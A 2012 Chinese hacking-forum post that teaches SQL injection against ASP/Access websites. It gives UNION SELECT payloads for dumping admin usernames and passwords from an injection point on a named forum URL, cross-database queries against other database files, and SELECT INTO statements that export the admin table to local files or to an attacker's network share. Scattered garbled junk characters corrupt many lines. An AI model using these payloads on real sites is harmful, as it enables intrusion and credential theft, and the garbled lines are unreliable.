--------------------------------------------------------------
: @/ E5 }8 u3 eunion查询法
- U4 A8 `% X: W3 B9 }首先要说的就是查询办法,一般的查询办法就是0 J/ y! O* v# r5 Y+ U, U
" g# O/ d- u' u3 I( b程序代码" w- Y# P4 e- q8 E
and 1=(select count(*) from admin where left(id,1)='1')
4 X( a1 c/ |& g
' F/ k7 f: r# q# V) O这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯./ k/ R9 f/ V8 ?9 f4 U ?: P
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
* t" b+ F {4 I譬如你有一个ACCESS点:
2 s2 ^, O( Y9 }& n8 \' z- g程序代码
* F; w' U4 g- [ P+ E3 |http://bbs.tian6.com/xiaoyang.asp?coder=1; M a+ x+ H N& v1 m" G3 |, B2 I
, L0 l0 q4 y% h! `6 v1 V知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),, c0 O/ e! X- J/ A
然后我们直接来:
1 ^. }( X! E( J8 x( n程序代码
( o; [# f# R/ f5 G4 Dhttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
# e$ ^2 x% P M9 E# W4 d. K
7 n' @" q9 H+ x5 v0 P这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.* b% o! Q" v# z) F; K! c" ^
; P% k1 j/ U' w* b/ j7 ^6 p) i
8 ]6 N% w: u) o' C$ w
0 K- X. [+ U8 T& T2 a: D
---------------------------------------------------------------7 e. x: T$ y& `) o u& f3 h! x1 _
Access跨库查询, s) l( ^ X- w7 v w0 s
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
/ U$ \, G+ p" P跨库的查询语句:% ^9 A7 Q+ A8 O$ e1 b6 R; S" \
子查询:+ [& D9 g9 u" N" }0 v
程序代码
A0 V$ r3 K$ p7 U3 R8 Pand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
$ ~( ]: y: X! h w! o- Q/ @3 S6 ?! }+ k& g0 A6 O$ R
union查询:% y7 _4 S+ w4 _- e, L' V) \
程序代码3 Q. n/ z! c, r, N3 t
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=15 R# f* b( o0 ]
% g9 }+ l' A3 G跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:; a; t/ u$ {, n A
程序代码
! e9 z1 k2 D# x' Bhttp://www.4ngel.net/article/46.htm , i1 J( E- B3 a6 E5 i( O8 @# j
http://hf110.com/Article/hack/rqsl/200502/66.html
: h+ g$ n+ |: n( d1 }
* L, v4 g' t& T' `( q- [. F. B---------------------------------------------------------------* Y! w5 t' U% o x F6 c
Access注入,导出txt,htm,html
# K0 T- x. e& M$ G4 y% `子查询语句:9 e8 Z+ A Y1 I
程序代码/ D' I0 H8 W+ o. h0 V
Select * into [test.txt] in 'd:\web\' 'text;' from admin' u- i( j2 z: c, `1 q( T9 U
! J- O" S% [1 |这样就把admin表的内容以test类型存进了d:\web里面.
6 O( A f7 q; h# j6 ^UNION查询:
+ p8 c7 l/ G+ n程序代码
9 u1 K4 {4 F5 o! ]4 G2 J0 C2 G0 U; J$ junion select * into [admin.txt] in 'c:\' 'test;' from admin# A- y/ I: D1 N5 ]
1 v9 l9 w8 u( n* I而且这里也可以保存到本地来:
" m7 ~1 Y' D) I! }% T程序代码
" P" s; p* Y1 M3 G7 u. d0 C& ASelect * into [test.txt] in '\\yourip\share' 'text;' from admin$ E5 J( \! Y }7 [
& I. ]/ ~- o* B, e1 B1 ~7 ?) \2 _
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:3 T2 N, o$ b4 D8 [+ s. b, @) ^
; n3 D \ c! j& Q7 i9 u9 y程序代码
+ L) n" v+ Z" Z7 A3 J1 K8 I+ y6 ^http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
k/ I" y0 R' M; H
' J# x; f& Q" S因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
4 J) e9 O* z. f: z |
发表于 2012-9-15 14:20:57
收藏
支持
反对